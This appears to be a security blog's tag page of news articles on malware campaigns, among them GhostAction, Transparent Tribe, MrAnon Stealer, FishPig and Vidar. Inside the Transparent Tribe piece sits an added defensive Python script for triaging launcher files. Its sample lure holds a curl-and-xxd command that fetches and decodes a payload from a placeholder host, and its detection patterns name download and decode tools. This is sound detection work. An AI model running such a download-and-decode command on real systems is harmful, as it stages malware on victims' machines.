Showing posts with label Malicious Files.

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems


A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.

Transparent Tribe Targets Indian Government's Custom Linux OS with Weaponized Desktop Files


Transparent Tribe, a cyber-espionage group believed to originate from Pakistan and also known as APT36, has stepped up its attacks on Indian government entities by using malicious desktop shortcuts designed to compromise both Windows and BOSS Linux systems. 

The latest tactics involve spear-phishing emails featuring fake meeting notices. These emails contain desktop shortcut files disguised as PDF documents (e.g., “Meeting_Ltr_ID1543ops.pdf.desktop”). When recipients attempt to open what appears to be a typical PDF, they instead activate a shell script that initiates the attack chain. 

The malicious script fetches a hex-encoded file from an attacker-controlled domain (“securestore[.]cv”), decodes it to an ELF binary, and saves it to the target computer's disk. During this process, the victim is shown a decoy PDF hosted on Google Drive, launched in Firefox, to avoid suspicion.

The dropped Go-based ELF binary then connects to a command-and-control (C2) server (“modgovindia[.]space:4000”), allowing attackers to issue commands, deliver additional malicious payloads, and steal sensitive data. 

Transparent Tribe’s campaign ensures persistence by setting up a cron job that automatically runs the main payload after reboots or process terminations. The malware is equipped with reconnaissance capabilities and includes dummy anti-debugging and anti-sandbox techniques to dodge detection by analysts and automated analysis platforms.
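A lure like the one described, a `.desktop` launcher named to look like a PDF whose `Exec` line fetches and decodes a payload, can be triaged from the file itself. The following is an added example, not code from CloudSEK, Hunt.io or the campaign: it parses a launcher's `[Desktop Entry]` group and collects the indicators the article mentions (a document extension in front of `.desktop`, an inline shell command, a download tool, a hex or base64 decoder, a PDF icon on a non-viewer). The two sample launchers, the payload host and the decoy URL are constructed placeholders.

```python
"""Triage of .desktop launchers that masquerade as documents, the lure described
for the Transparent Tribe campaign. Standard library only; samples are constructed."""
import configparser
import re
from pathlib import PurePath

DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
SHELL_WITH_C = re.compile(r"\b(?:sh|bash|dash|zsh|python3?|perl)\b\s+-c\b")
FETCH_TOOLS = re.compile(r"\b(?:curl|wget)\b")
DECODERS = re.compile(r"\b(?:xxd\s+-r|base64\s+(?:-d|--decode))\b")


def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict (keys lower-cased), or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return None
    return dict(cp["Desktop Entry"])


def assess_desktop_file(filename, text):
    """Collect indicators that a launcher is a document-themed dropper."""
    findings = []
    inner = PurePath(PurePath(filename).stem).suffix.lower()  # ext before .desktop
    if inner in DOC_EXTENSIONS:
        findings.append("double extension: document name ending in .desktop")
    entry = parse_desktop_entry(text)
    if entry is not None:
        exec_line = entry.get("exec", "")
        if SHELL_WITH_C.search(exec_line):
            findings.append("Exec runs an inline shell/script (-c)")
        if FETCH_TOOLS.search(exec_line):
            findings.append("Exec fetches content from the network (curl/wget)")
        if DECODERS.search(exec_line):
            findings.append("Exec decodes a payload (xxd -r / base64 -d)")
        if "pdf" in entry.get("icon", "").lower() and SHELL_WITH_C.search(exec_line):
            findings.append("Icon presents a PDF while Exec is a shell command")
    # A document-named launcher that also does something a document never
    # does (shell, download, decode) is what merits quarantine and review.
    return {"filename": filename, "findings": findings, "suspicious": len(findings) >= 2}


# Constructed lure modelled on the reported chain (placeholder host and decoy).
LURE_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://payload-host.invalid/stage.hex | xxd -r -p > /tmp/.cache-upd; firefox https://drive.google.com/file/d/DECOY_PLACEHOLDER"
"""

# Constructed ordinary launcher for comparison.
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Icon=firefox
Exec=firefox %u
Terminal=false
"""
```

The threshold of two indicators keeps a plain `report.pdf.desktop` with an honest viewer command below the line while the constructed lure trips all five checks. On a mail gateway or endpoint this would sit alongside the simpler controls the article implies: blocking `.desktop` attachments outright and not granting execute permission to launchers dropped into user directories.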

A known backdoor associated with the group, Poseidon, is deployed for deeper intrusion. Poseidon enables long-term access, data exfiltration, credential theft, and lateral movement within compromised environments. 

CloudSEK and Hunt.io, two cybersecurity firms, reported that this sophisticated campaign reflects APT36’s ongoing adaptation—modifying attacks based on the victim's operating system to maximize the success rate and persistence. 

In recent weeks, similar attacks by Transparent Tribe targeted Indian defense organizations using spoofed login pages intended to collect credentials and two-factor authentication (2FA) codes, especially the Kavach 2FA system widely adopted within Indian government agencies. 

The phishing pages, designed to closely resemble official Indian government sites, prompt users to enter both their email credentials and Kavach code. Typo-squatted domains and Pakistan-based infrastructure are consistently used, aligning with the group’s established tactics. 

Recent campaigns have also targeted countries such as Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey using spear-phishing emails that mimic governmental communication and leverage lookalike pages for credential theft. Another South Asian group, SideWinder, has employed similar techniques, using fake Zimbra and portal pages to gather government users’ login information, illustrating the widespread threat landscape in the region.

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits


Since 2017, at least 11 state-sponsored threat groups have actively exploited a Microsoft zero-day issue that allows for abuse of Windows shortcut files to steal data and commit cyber espionage against organisations across multiple industries. 

Threat analysts from Trend Micro's Trend Zero Day Initiative (ZDI) discovered roughly 1,000 malicious .lnk files that exploited the flaw, tracked as ZDI-CAN-25373, which allows attackers to execute concealed malicious commands on a victim's PC via crafted shortcut files.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 

State-sponsored groups from North Korea, Iran, Russia, and China, as well as non-state actors, are among those exploiting the flaw, in attacks that have affected organisations in the government, financial, telecommunications, military, and energy sectors across North America, Europe, Asia, South America, and Australia. 

Additionally, 45% of the attacks were carried out by North Korean actors, with Iran, Russia, and China each accounting for approximately 18%. Groups identified among the attackers include Evil Corp, Kimsuky, Bitter, and Mustang Panda.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through Trend ZDI's bug bounty program. Trend Micro did not respond to a follow-up request for comment on its detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block threat behaviour, as detailed by Trend Micro, and Microsoft's Windows Smart App Control prevents malicious files from being downloaded from the internet. Furthermore, Windows recognises shortcut (.lnk) files as potentially malicious file types, and the system will automatically display a warning if a user attempts to download one.

MrAnon Stealer Propagates via Email with Fake Hotel Booking PDF


FortiGuard Labs cybersecurity experts have discovered a sophisticated email phishing scheme that uses fraudulent hotel reservations to target unsuspecting victims. The phishing campaign involves the deployment of an infected PDF file, which sets off a chain of actions that culminates in the activation of the MrAnon Stealer malware. 

The attackers, as initially reported by Hackread, pose as a hotel reservation company rather than relying on complex technical means. They send phishing emails with the subject "December Room Availability Query," containing fake holiday-season booking details. A downloader link embedded in the malicious PDF file initiates the infection chain. 

Following an investigation, FortiGuard Labs experts uncovered a multi-stage process involving .NET executable files, PowerShell scripts, and fraudulent Windows Forms dialogs. The attackers navigate these stages using techniques such as fake error messages to mask the successful execution of the MrAnon Stealer malware. 

MrAnon Stealer runs in the background and is packaged with cx-Freeze to obscure its behaviour and evade detection. Its capabilities include screenshot capture, IP address retrieval, and the collection of sensitive information from various applications. 

MrAnon Stealer, according to FortiGuard Labs, can steal information from bitcoin wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. It specifically targets VPN clients such as NordVPN, ProtonVPN, and OpenVPN Connect. The attackers employ a Telegram channel as a means of exchange for command and control. Using a bot token, the stolen data is sent to the attacker's Telegram channel, along with system information and a download link.

As evidenced by the spike of requests for the downloader URL in November 2023, this malware campaign was aggressive and actively running, with a primary target on Germany. The hackers demonstrated a calculated strategy by switching from Cstealer in July and August to the more potent MrAnon Stealer in October and November. 

Users are strongly advised to exercise caution, especially with unexpected emails containing suspicious attachments, at a time when online threats are at an all-time high. Vigilance and common sense remain key to thwarting such campaigns, which succeed by exploiting human error rather than technical weaknesses.

Threat Actors Distribute Around 400K Malicious Files Every Day to Attack Users


According to a recent report, nearly 400,000 new malicious files were distributed every day by threat actors in 2022 to deceive and attack online users, a 5 percent increase over the 2021 figure. 

Kaspersky, the cybersecurity company that published the estimate, reports that almost 380,000 such files were detected daily in 2021, and that 122 million harmful files were detected in total in 2022, an increase of six million from the year before. 

“Considering how quickly the threat landscape is expanding its boundaries and the number of new devices appearing in users' daily lives, it's quite possible that next year we'll be detecting not 400,000 malicious files per day, but half a million,” says Vladimir Kuskov, head of anti-malware research at Kaspersky. 

"Even more dangerous is that, with the development of Malware-as-a-Service, any novice fraudster can now attack devices without any technical knowledge in programming," Kuskov continues. 

Kaspersky's research indicates that the number of ransomware samples detected every day grew by 181 percent compared with 2021, with around 9,500 encrypting files detected daily.

Kaspersky also detected a 142 percent rise in the number of downloaders, malware programs designed to install malicious and unwanted applications on a device. Windows remained the platform most commonly targeted by these threat families. 

Kaspersky experts detected 320,000 new malicious files targeting Windows devices in 2022, the report added.

Moreover, Kaspersky experts observed a 10 percent rise in the number of malicious files targeting Android devices each day in 2022.

Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores


For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimizations and Magento-WordPress integrations, and its Magento extensions have received over 200,000 downloads. FishPig issued a warning on Tuesday about an intrusion into its extension licence system that resulted in a threat actor injecting malicious PHP code into the Helper/License.php file. 

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

The hackers likely had access to the company's servers since at least August 6, according to the company. According to Sansec, the security researchers who discovered the intrusion, the injected code would install another piece of malware called Rekoobe, which hides as a background process on the compromised servers.

Sansec further stated that the malicious code injected into License.php would download a Linux binary from license.fishpig.co.uk every time the FishPig control panel was accessed in the Magento backend. The downloaded file, named 'lic.bin', appears to be a licensing asset but is actually the Rekoobe remote access trojan.

The trojan removes all malicious files from the infected machine after execution, but it remains in memory, impersonating a system service while waiting for instructions from its command and control (C&C) server, according to the researchers. FishPig claims that the malicious code has been removed from its servers and that all modules have been updated.

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.

Russia Dubbed as the "Centre" of European-wide Cyber-Attacks


Since the beginning of Russia's invasion of Ukraine, the EU, UK, US, and other allies have recognized that Russia has been behind a wave of cyber-attacks. The most recent distributed denial-of-service (DDoS) attack on Viasat's commercial communications network in Ukraine, which occurred on the same day that Russia launched its full-fledged invasion, had a greater impact across Europe, disrupting wind farms and internet users. 

The outage on Viasat affected almost one-third of bigblu's 40,000 users throughout Europe, including Germany, France, Hungary, Greece, Italy, and Poland, according to Eutelsat, the parent company of the bigblu satellite internet service. The incident also affected wind farms and internet users in central Europe and caused outages for thousands of Ukrainian customers. 

In this regard, the key statements by the West are as follows:

  • The European Union said that Russia was behind the strike, which occurred "one hour before" the invasion of Ukraine. 
  • Estonia: The European Union member went even further. With "high certainty," the country blamed the hack on Russia's military intelligence arm, saying it had "gone counter to international law." 
  • The United Kingdom's National Cyber Security Centre is "almost convinced" that Russia was behind the Viasat attack, according to the UK, citing "new UK and US intelligence." Meanwhile, the report said that "Russian Military Intelligence was probably certainly involved" in defacing Russian websites and releasing damaging spyware.

The main target, according to the joint intelligence advisory, was the Ukrainian military. "Thousands of terminals have been destroyed, rendered useless, and are unable to be restored," according to Viasat. Russian military intelligence was almost certainly involved in the January 13 attacks on Ukrainian official websites and the distribution of the destructive WhisperGate malware, according to the UK's National Cyber Security Centre (NCSC). 

"This is clear and alarming proof of an intentional and malicious attack by Russia against Ukraine, which had huge ramifications for ordinary people and businesses in Ukraine and across Europe," Foreign Secretary Liz Truss said. 

In June 2017, Russian actors hijacked the update mechanism of Ukrainian accounting software provider MEDoc, infecting MEDoc users with the NotPetya wiper. Evidence suggests that wiper malware again infected several Ukrainian government networks in 2022, and Gamaredon attacks targeted roughly 5,000 entities, including critical infrastructure and government departments.

NCSC director of operations Paul Chichester addressed why the attribution was being done now, two and a half months after the occurrence, at a press conference at CYBERUK 2022. "We execute attributions in a process-driven manner; accuracy is extremely essential to us," he explained. Collaboration with international bodies such as the EU and the Five Eyes adds to the length of time it took to provide this material. 

Such cyber operations aim to demoralise the public and degrade essential infrastructure. The perceived difficulty of precisely attributing an attack to any single aggressor is one advantage of conducting the earliest stages of kinetic activity in cyberspace. Putin has emphatically denied any Russian government involvement in the attacks.

Vidar Spyware Exploits Microsoft Help Files to Bypass Detection


Vidar spyware has been discovered in a new phishing campaign that exploits Microsoft HTML help files. The spyware is hidden in Microsoft Compiled HTML Help (CHM) files to bypass detection in email spam campaigns, Trustwave cybersecurity expert Diana Lopera stated. 

Vidar is Windows spyware and an information stealer capable of harvesting user and operating-system data, cryptocurrency account credentials, and payment details such as credit card numbers. 

While threat actors often distribute malware via spam and phishing campaigns, Trustwave researchers have also uncovered the C++ malware being deployed via the pay-per-install PrivateLoader dropper, and the Fallout exploit kit. 

According to researchers, threat actors employ the age-old strategy of tricking people into downloading seemingly innocent files that are actually malicious. The malicious emails carry a generic subject line and an attachment, "request.doc," which is actually an .iso disk image. The .iso contains two files: a Microsoft Compiled HTML Help file (CHM), often named pss10r.chm, and an executable named app.exe. 

CHM is Microsoft's compiled online help format, used to distribute documentation and help files; the compressed HTML container can carry images, tables and links. When malicious actors abuse CHM, they can use the format to make the Microsoft Help Viewer (hh.exe) load and run objects embedded in the file. 

When the malicious CHM file is opened, an embedded JavaScript snippet silently executes app.exe; both files must sit in the same directory, and this launches the Vidar payload. 

The Vidar samples gathered by researchers reach their command-and-control (C2) server via Mastodon, an open-source social networking platform. The malware searches for specific profiles and collects C2 addresses from those users' profile bio sections. This lets the spyware retrieve its configuration and start exfiltrating user data. 

To protect against this campaign, follow the standard defences against email spam, such as verifying the source of an email before downloading any attachment, and run reputable antivirus software on your PC. 

"Since this Vidar campaign utilizes social engineering and phishing, ongoing security awareness training for your staff is essential. Organizations should also consider implementing a secure email gateway for 'defense in depth' layered security in order to filter these types of phishing attacks before they even get to any inboxes,” stated Karl Sigler, Trustwave threat intelligence manager. 

"Vidar itself is an information stealer type of malware. It grabs as much data as it can from the victim's system, sends it back to the attackers, and then deletes itself. This includes any local password stores, web browser cookies, crypto wallets, contact databases, and other types of potentially valuable data."